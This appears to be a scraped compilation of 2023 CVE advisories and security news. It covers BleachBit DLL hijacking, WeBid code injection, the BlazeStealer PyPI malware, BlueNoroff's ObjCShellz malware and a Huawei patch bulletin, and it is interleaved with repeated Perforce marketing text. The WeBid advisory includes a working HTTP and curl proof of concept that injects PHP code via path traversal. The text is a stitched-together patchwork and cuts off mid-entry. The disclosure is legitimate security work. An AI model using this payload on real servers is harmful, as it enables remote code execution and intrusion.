BleachBit cleans files to free disk space and to maintain privacy. BleachBit for Windows up to version 4.4.2 is vulnerable to a DLL Hijacking vulnerability. By placing a DLL in the Folder c:\DLLs, an attacker can run arbitrary code on every execution of BleachBit for Windows. This issue has been patched in version 4.5.0.


**Impact**

BleachBit for Windows up to Version 4.4.2 is vulnerable to a DLL Hijacking vulnerability (CWE-427).  
By placing a DLL in the Folder c:\\DLLs, an attacker can run arbitrary code on every execution of BleachBit for Windows. This affects both bleachbit.exe and bleachbit\_console.exe

The impact varies depending on the scenario.  
**Privilege Escalation**: In normal operation, BleachBit uses UAC to run in an elevated context. This means,  
that malware running in an non elevated user context can place the payload and wait till a user runs  
BleachBit. Once the Users runs BleachBit in an elevated context (which is default), the malicious payload  
also gets executed elevated.

**Persistence**: Malware can use the vulnerability as a method of persistence. Every time a user executes  
BleachBit, the malicious payload will be executed.

**Evasion**: Execute malicious payload through the process of a legitimate executable bleachbit.exe or  
bleachbit\_console.exe

**Spreading**: On a multi-user system, compromised User A will create the malicious DLL. Once user B  
executes BleachBit, the payload will be triggered.

**Patches**

_Has the problem been patched? What versions should users upgrade to?_

**Workarounds**

As an Administrator, create the directory c:\\DLLs with permissions that prevent regular (non elevated) users from creating files. This can prevent a user or malware running in its context from creating the corresponding DLL.

Upgrade to BleachBit version 4.6.0 (final) which has a workaround to refuse to start if DLL hijacking is detected.

Upgrade to BleachBit 4.4.2.2467 (alpha) which has a proper fix because it is based on Python 3.10 instead of Python 3.4

CVE-2023-47113: DLL Search Order Hijacking vulnerability in BleachBit for Windows

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified.  Reported by Jason Geffner.  


**Trending at Perforce**

**Explore Our Products**

**

Enterprises Who Choose Perforce Solutions...

**

Background Image

Achieve ROI within a year.

Background Image

Achieve compliance certifications in record time.

Background Image

Go from three days to 35 minutes for testing.

Background Image

Gain a competitive edge.

Background Image

Avoid security breaches.

Background Image

Innovate and deploy without risk.

Background Image

Save 1,000s of development hours.

Background Image

Accelerate time-to-market regardless of size or complexity.

CUSTOMER REVIEWS

"It is really fast when comes to dealing with data and code. GUI is really simple and easy to use."

"Continues to deliver business value for our organization and delivers on ROI."

"Getting the strategy off the ground, Akana was the perfect partner."

**Over 75% of Fortune 100 Companies Use Perforce**

**

Solutions For Your Industry

**

**Game Development**

**Embedded Systems**

**Automotive**

**Healthcare**

**Government**

**Film & Animation**

**Semiconductor**

**Medical Devices**

**Financial Services**

**Software & Technology**

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

“I don’t know how we could do the kind of designs and the innovation we do without Perforce. Perforce has been critical to our success.”

Doug Quist

Director of IT and Engineering

“Device management was a huge benefit of the solution. We want to test on the actual devices customers are using. We are simply unwilling to put customers at risk.”

Sharon Chamberlain

Test Automation Manager

"Perforce has been key to us achieving DevOps."

Way Christiansen

Senior Staff Engineer

**When Failure Is Not an Option, You Need the Power of Perforce**

Perforce Software delivers solutions across DevOps designed to help you increase your competitive advantage by addressing quality, security, compliance, collaboration, and speed — across the technology lifecycle.Contact us to learn more about how our solutions can help you accelerate digital transformation, innovate at scale, and achieve DevOps success.

CONTACT USVIEW ALL PRODUCTS

**Sharpen Your Skills, Accelerate Your Teams**

Join upcoming events and webinars with industry-leading experts on how to conquer challenges and drive innovation.

November 10-11, 2023

**ICCAD 2023**

ICCAD 2023

Trade Show

November 12-17, 2023

**SC23**

The international conference for high performance computing, networking, storage, and analysis.

Trade Show

December 4-8, 2023

**Embedded Software Engineering Kongress 2023**

ESE Kongress is Germany’s leading congress for the embedded software industry. Every December, about 1,200 professionals get together to catch up on current technologies and methods, to discuss trends and to set the course for the future.

On the Road

**Award-Winning Innovation: That’s the Power of Perforce**

**SD Times Top 100, Best in Show: Development Tools**

Perforce Software, 2020

**EY Entrepreneur of the Year Heartland Award Winner**

CEO Mark Ties, 2020

**North American Software Testing & QE Awards Finalist**

Perfecto, 2020

**CEDEC Award for Engineering Winner**

Helix Core, 2019

**Get the Power of Perforce Today**

Learn more about how our solutions will help you innovate at scale, achieve higher quality, strengthen security, and accelerate velocity.

**Free Trials**

Get started with a free trial of one of our solutions.

**About Perforce**

Learn more about Perforce solutions for DevOps at scale.

CVE-2023-5759: Perforce Software | Development Tools For Innovation at Scale

WeBid <=1.2.2 is vulnerable to code injection via admin/categoriestrans.php.

vendor: https://github.com/renlok/WeBid

version: <= 1.2.2

php version: 7.x

**Vulnerability description**

A code injection(CWE-94) vulnerability in admin/categoriestrans.php. The $_POST['categories'] as a parameter for rebuild_cat_file is concatenated into the $output and ultimately written to the 'language/' . $lang . '/categories.inc.php' file. The $lang can be controlled by $_GET['lang'], which allows attackers to write the categories.inc.php file into any directory, leading to remote code execution.

    $lang = (isset($_GET['lang'])) ? $_GET['lang'] : $system->SETTINGS['defaultlanguage'];
    $catscontrol = new MPTTcategories();
    
    function search_cats()
    {
        global $catscontrol;
        $catstr = '';
        $root = $catscontrol->get_virtual_root();
        $tree = $catscontrol->display_tree($root['left_id'], $root['right_id'], '|___');
        foreach ($tree as $k => $v) {
            $v = str_replace("'", "\'", $v);
            $catstr .= ",\n" . $k . " => '" . addslashes($v) . "'";
        }
        return $catstr;
    }
    
    function rebuild_cat_file($cats)
    {
        global $lang;
        $output = "<?php\n";
        $output.= "$" . "category_names = array(\n";
    
        $num_rows = count($cats);
    
        $i = 0;
        foreach ($cats as $k => $v) {
            $v = str_replace("'", "\'", $v);
            $output .= "$k => '$v'";
            $i++;
            if ($i < $num_rows) {
                $output .= ",\n";
            } else {
                $output .= "\n";
            }
        }
    
        $output .= ");\n\n";
    
        $output .= "$" . "category_plain = array(\n0 => ''";
    
        $output .= search_cats();
    
        $output .= ");";
    
        $handle = fopen(MAIN_PATH . 'language/' . $lang . '/categories.inc.php', 'w');
        fputs($handle, $output);
        fclose($handle);
    }
    
    if (isset($_POST['categories'])) {
        rebuild_cat_file($_POST['categories']);
        include 'util_cc1.php';
    }
    

The POC is as follows:

    POST /Webid/admin/categoriestrans.php?lang=.. HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    
    categories[123);system("whoami");/*]=test
    

The curl command to verify vulnerability:

    curl -i -s -k -X $'POST' \
        -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 41' \
        -b $'PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \
        --data-binary $'categories[123);system(\"whoami\");/*]=test' \
        $'http://localhost/Webid/admin/categoriestrans.php?lang=..'

CVE-2023-47397: Affected version.md

A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems.
The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News.
"[BlazeStealer]

Supply Chain / Software Security

A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems.

The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called **BlazeStealer**, Checkmarx said in a report shared with The Hacker News.

"\[BlazeStealer\] retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim's computer," security researcher Yehuda Gelb said.

The campaign, which commenced in January 2023, entails a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October.

These modules come with setup.py and init.py files that are designed to retrieve a Python script hosted on transfer\[.\]sh, which gets executed immediately upon their installation.

Called BlazeStealer, the malware runs a Discord bot and enables the threat actor to harvest a wide range of information, including passwords from web browsers and screenshots, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host.

What's more, it can render the computer unusable by ramping up CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even forcing a blue screen of death (BSoD) error.

"It stands to reason that developers engaged in code obfuscation are likely dealing with valuable and sensitive information, and therefore, to a hacker, this translates to a target worth pursuing," Gelb noted.

A majority of downloads associated with the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down.

"The open-source domain remains a fertile ground for innovation, but it demands caution," Gelb said. "Developers must remain vigilant, and vet the packages prior to consumption."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

By Waqas
Jamf Threat Labs’ security experts have discovered a new malware variant attributed to the BlueNoroff APT group. According…
This is a post from HackRead.com Read the original post: BlueNoroff APT Targets macOS with new RustBucket Malware Variant

Jamf Threat Labs’ security experts have discovered a new malware variant attributed to the BlueNoroff APT group. According to the company’s blog post published on 7 November 2023, this campaign, like BlueNoroff’s previous campaigns, seems to be financially motivated. The threat actor has a history of targeting cryptocurrency exchanges, venture capital firms, and banks. BlueNoroff is a subgroup of the larger North Korean state-backed group called Lazarus.

The malware, dubbed ObjCShellz, is part of the RustBucket campaign, researchers believe. It is a later-stage malware variant of BlueNoroff’s RustBucket malware, because of their similar characteristics. For your information, a later-stage malware is one that’s executed after the attacker has gained initial access and used for data exfiltration, lateral movement within the network, or maintaining persistence.

The malware was discovered while performing routine threat hunting. Further probing revealed that it was a Mach-O universal binary communicating with a domain (swissborgblog registered on May 31, 2023) that the company had previously classified as malicious because it was a fake version of the original domain (swissborg.com). The attackers created a fake crypto exchange website on this fake domain to trick users.

The malware is ad-hoc signed and can split its C2 URL into two different strings to evade detection. The IP address researchers detected (104.168.214151) was also linked to the same APT actor from their previous campaigns.

 “We have observed submissions to VirusTotal from countries such as Japan and the US in September and October” researchers noted.

ObjCShellz is written in Objective-C, a programming language used for macOS applications. It is used as a macOS implant that establishes C2 communication after infiltrating the device and downloads/executes multiple payloads. It is a lightweight malware featuring advanced obfuscation features. It operates as a simple remote shell and executes shell commands received from the C2 server. The malware sends a POST message to the fake URL version and gains information about the malware process before retrieving the operatingSystemVersionString to find out the macOS version.

Researchers could not determine how initial access was achieved. However, they are sure that this is a later-stage malware used in this multi-stage attack to run remote shell commands manually on Intel and Arm Macs.

The threat actor generally reaches out to victims as an investor or creates domains belonging to a legitimate crypto exchange. In this campaign too, the attacker contacts the victims as a head hunter.investor, offering them something beneficial or a partnership. Despite being simple, this malware is very functional and can allow threat actors to carry out a range of malicious objectives.

Hackread.com has observed a continuous surge in attacks against macOS devices and BlueNoroff’s activities. Earlier in November, Elastic Security Labs detected Lazarus group using a new macOS malware dubbed KandyKorn, targeting cryptocurrency users and blockchain engineers. Back in 2021, AT&T Alien Labs researchers discovered that threat actors were harnessing malware-infected Macs and Windows devices as proxy exit nodes to reroute proxy requests. In December 2022, Kaspersky researchers reported that BlueNoroff is targeting cryptocurrency-related financial entities worldwide with new, sophisticated malware strains and 70 fake domains of venture capital firms and banks.

To protect against ObjCShellz malware, organizations must keep software and operating systems patched against new security flaws, use EDR (endpoint detection and response) solutions to monitor network activities, and employ network segmentation strategies to limit malware distribution by isolating critical systems.

Cybersecurity expert at the California-based Menlo Security browser security provider firm, Mr. Ngoc Bui, shared his findings on the BlueNoroff APT actor exclusively with Hackread.com. Bui noted that it has been active since 2016-2017 and its key targets are financial entities in Europe and North America. 

“BlueNoroff is a North Korean-backed advanced persistent threat (APT) group that has been active since at least 2016/2017. The group is known for targeting cryptocurrency exchanges, venture capital firms, and banks in North America and Europe. BlueNoroff’s attacks are typically financially motivated, and the group has been known to use a variety of malware and techniques to steal sensitive data and funds from its victims.”

About their malware RustBucket, Bui noted that this backdoor is written in rust and collects basic system details before contacting the C2. 

“RustBucket is a backdoor written in rust. The backdoor collects basic system information and communicates to the URL provided via the command line. Supported backdoor commands include file execution and exit. RustBucket is a malware campaign also attributed to BlueNoroff, first uncovered in 2021. It uses phishing emails posing as job recruiters to infect targets with backdoor malware that can steal data and remotely control infected systems,” Bui explained.

Bui believes that Jamf Threat Labs’ discover holds significance because it highlights that the actor is continually improving its malware strains. 

“The discovery of the new malware strain by Jamf Threat Labs is significant because it shows that BlueNoroff is continuing to develop new and sophisticated malware. The fact that the malware was undetected by VirusTotal at the time of uploading suggests that BlueNoroff is taking steps to evade detection. For North Korea, this is a big deal if you have been following the different APTs and activities from that country.”

 Bui noted that ObjCShellz is a big threat for macOS users “because it is disguised as legitimate software and can be difficult to detect. The malware can also steal sensitive data, such as cryptocurrency wallets and passwords. And a low detection rate means it may get past AV.”

Colorado-based cybersecurity advisory services provider Coalfire’s vice president Andrew Baratt told Hackread.com that it is hard to draw definite linkages between malware.

“It’s hard to really draw official linkages between malware that shares commonalities as many disparate threat actors borrow and steal from other malware campaigns. Copying legit sites is a fairly common tactic to evade detection on the C2 side of a malicious capability.” 

“We’ve been pointing out for some time that VirusTotal (VT) is only as good as its first observation time, and if malware authors are building up offline testing capabilities, the time it takes for detection is going to be much more significant. We also potentially have the signs of AI usage creeping into malware development. Historically, it can be seen in VT as it has been used as a test run for a piece of malware – as a cross over for detection -then multiple iterations are used until evasion is achieved. The challenge for the malware is that this creates a timeframe and VT, now owned by Google, has a window of advantage to do further analysis. If they’re using generative AI to help modify the malware, there is a real potential for new evasion techniques to be used with a reasonably high degree being under the purview of VT,” Baratt stated.

BlueNoroff APT Targets macOS with new RustBucket Malware Variant

By Waqas
BlueNoroff is a subgroup of the larger North Korean state-backed group called Lazarus.
This is a post from HackRead.com Read the original post: Lazarus-Linked BlueNoroff APT Targeting macOS with ObjCShellz Malware

The threat actor has a history of targeting cryptocurrency exchanges, venture capital firms, and banks.

Jamf Threat Labs’ security experts have discovered a new malware variant attributed to the BlueNoroff APT group. According to the company’s blog post published on 7 November 2023, this campaign, like BlueNoroff’s previous campaigns, seems to be financially motivated.

The threat actor has a history of targeting cryptocurrency exchanges, venture capital firms, and banks. BlueNoroff is a subgroup of the larger North Korean state-backed group called Lazarus.

The malware, dubbed ObjCShellz, is part of the RustBucket campaign, researchers believe. It is a later-stage malware variant of BlueNoroff’s RustBucket malware, because of their similar characteristics.

For your information, a later-stage malware is one that’s executed after the attacker has gained initial access and used for data exfiltration, lateral movement within the network, or maintaining persistence.

The malware was discovered while performing routine threat hunting. Further probing revealed that it was a Mach-O universal binary communicating with a domain (swissborgblog registered on May 31, 2023) that the company had previously classified as malicious because it was a fake version of the original domain (swissborg.com). The attackers created a **fake crypto exchange website** on this fake domain to trick users.

The malware is ad-hoc signed and can split its C2 URL into two different strings to evade detection. The IP address researchers detected (104.168.214151) was also linked to the same APT actor from their previous campaigns.

 “We have observed submissions to VirusTotal from countries such as Japan and the US in September and October” researchers noted in their **blog post**.

ObjCShellz is written in Objective-C, a programming language used for macOS applications. It is used as a macOS implant that establishes C2 communication after infiltrating the device and downloads/executes multiple payloads.

ObjCShellz is a lightweight malware featuring advanced obfuscation features. It operates as a simple remote shell and executes shell commands received from the C2 server. The malware sends a POST message to the fake URL version and gains information about the malware process before retrieving the operatingSystemVersionString to find out the macOS version.

Researchers could not determine how initial access was achieved. However, they are sure that this is a later-stage malware used in this multi-stage attack to run remote shell commands manually on Intel and Arm Macs.

The threat actor generally reaches out to victims as an investor or creates domains belonging to a legitimate crypto exchange. In this campaign too, the attacker contacts the victims as a head hunter or investor, offering them something beneficial or a partnership. Despite being simple, this malware is very functional and can allow threat actors to carry out a range of malicious objectives.

Hackread.com has observed a continuous surge in attacks against macOS devices and BlueNoroff’s **activities**. Earlier in November, Elastic Security Labs **detected** Lazarus group using a new macOS malware dubbed KandyKorn, targeting cryptocurrency users and blockchain engineers.

Back in 2021, AT&T Alien Labs researchers **discovered that** threat actors were harnessing malware-infected Macs and Windows devices as proxy exit nodes to reroute proxy requests. In December 2022, Kaspersky researchers **reported** that BlueNoroff is targeting cryptocurrency-related financial entities worldwide with new, sophisticated malware strains and 70 fake domains of venture capital firms and banks.

To protect against ObjCShellz malware, organizations must keep software and operating systems patched against new security flaws, use EDR (endpoint detection and response) solutions to monitor network activities, and employ network segmentation strategies to limit malware distribution by isolating critical systems.

Cybersecurity expert at the California-based **Menlo Security** browser security provider firm, Mr. Ngoc Bui, shared his findings on the BlueNoroff APT actor exclusively with Hackread.com. Bui noted that it has been active since 2016-2017 and its key targets are financial entities in Europe and North America. 

“BlueNoroff is a North Korean-backed advanced persistent threat (APT) group that has been active since at least 2016/2017. The group is known for targeting cryptocurrency exchanges, venture capital firms, and banks in North America and Europe,” explained Bui BlueNoroff’s attacks are typically financially motivated, and the group has been known to use a variety of malware and techniques to steal sensitive data and funds from its victims.”

About their malware RustBucket, Bui noted that this backdoor is written in rust and collects basic system details before contacting the C2. 

“RustBucket is a backdoor written in rust. The backdoor collects basic system information and communicates to the URL provided via the command line. Supported backdoor commands include file execution and exit. RustBucket is a malware campaign also attributed to BlueNoroff, first uncovered in 2021. It uses phishing emails posing as job recruiters to infect targets with backdoor malware that can steal data and remotely control infected systems,” Bui said.

Bui believes that Jamf Threat Labs’ discover holds significance because it highlights that the actor is continually improving its malware strains. 

“The discovery of the new malware strain by Jamf Threat Labs is significant because it shows that BlueNoroff is continuing to develop new and sophisticated malware. The fact that the malware was undetected by VirusTotal at the time of uploading suggests that BlueNoroff is taking steps to evade detection. For North Korea, this is a big deal if you have been following the different APTs and activities from that country.”

Bui noted that ObjCShellz is a big threat for macOS users “because it is disguised as legitimate software and can be difficult to detect. The malware can also steal sensitive data, such as cryptocurrency wallets and passwords. And a low detection rate means it may get past AV.”

Colorado-based cybersecurity advisory services provider **Coalfire**’s vice president Andrew Baratt told Hackread.com that it is hard to draw definite linkages between malware.

“It’s hard to really draw official linkages between malware that shares commonalities as many disparate threat actors borrow and steal from other malware campaigns. Copying legit sites is a fairly common tactic to evade detection on the C2 side of a malicious capability.” 

“We’ve been pointing out for some time that VirusTotal (VT) is only as good as its first observation time, and if malware authors are building up offline testing capabilities, the time it takes for detection is going to be much more significant. We also potentially have the signs of AI usage creeping into malware development,” said Baratt.

Historically, it can be seen in VT as it has been used as a test run for a piece of malware – as a cross over for detection -then multiple iterations are used until evasion is achieved. The challenge for the malware is that this creates a timeframe and VT, now owned by Google, has a window of advantage to do further analysis. If they’re using generative AI to help modify the malware, there is a real potential for new evasion techniques to be used with a reasonably high degree being under the purview of VT,” Baratt explained.

****_RELATED ARTICLES_****

1.  **MacStealer: A New Malware Targeting macOS Catalina Devices**
2.  **New macOS malware XcodeSpy found sneaking into spy on victims**
3.  **Linux, Windows and macOS Hit By New “Alchimist” Attack Framework**
4.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
5.  **UpdateAgent malware variant impersonates legitimate macOS software**

Lazarus-Linked BlueNoroff APT Targeting macOS with ObjCShellz Malware

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

CVE-2023-41270: SMOLD TV: Old & Smart

Vulnerability of identity verification being bypassed in the face unlock module. Successful exploitation of this vulnerability will affect integrity and confidentiality.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the October 2023 Android security bulletin:

Critical: CVE-2023-4863

High: CVE-2023-40128, CVE-2023-21266, CVE-2023-40121, CVE-2023-40123, CVE-2023-40133, CVE-2023-40134, CVE-2023-40135, CVE-2023-40136, CVE-2023-40137, CVE-2023-40138, CVE-2023-40139, CVE-2023-40140, CVE-2023-40125, CVE-2023-40127, CVE-2023-40130, CVE-2023-33034, CVE-2023-33035, CVE-2023-21394

Medium: none

Low: none

Already included in previous updates: CVE-2023-21281, CVE-2022-20281, CVE-2023-21177

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2022-48613: Race condition vulnerability in the kernel module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause variable values to be read with the condition evaluation bypassed.

CVE-2023-44098: Vulnerability of missing encryption in the card management module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2023-44115: Vulnerability of improper permission control in the Booster module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2023-46755: Vulnerability of input parameters being not strictly verified in the input method module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause the launcher to restart.

CVE-2023-46756: Permission control vulnerability in the window management module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause malicious pop-up windows.

CVE-2023-46758: Permission management vulnerability in the multi-screen interaction module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause service exceptions of the device.

CVE-2023-46759: Permission control vulnerability in the call module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2023-46760: Out-of-bounds write vulnerability in the kernel driver module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause process exceptions.

CVE-2023-46761: Out-of-bounds write vulnerability in the kernel driver module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause process exceptions.

CVE-2023-46762: Out-of-bounds write vulnerability in the kernel driver module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause process exceptions.

CVE-2023-46763: Vulnerability of background app permission management in the framework module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause background apps to start maliciously.

CVE-2023-46764: Unauthorized startup vulnerability of background apps

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1 , EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause background apps to start maliciously.

CVE-2023-46765: Vulnerability of uncaught exceptions in the NFC module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can affect NFC availability.

CVE-2023-46766: Out-of-bounds write vulnerability in the kernel driver module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause process exceptions.

CVE-2023-46767: Out-of-bounds write vulnerability in the kernel driver module

Severity: Medium

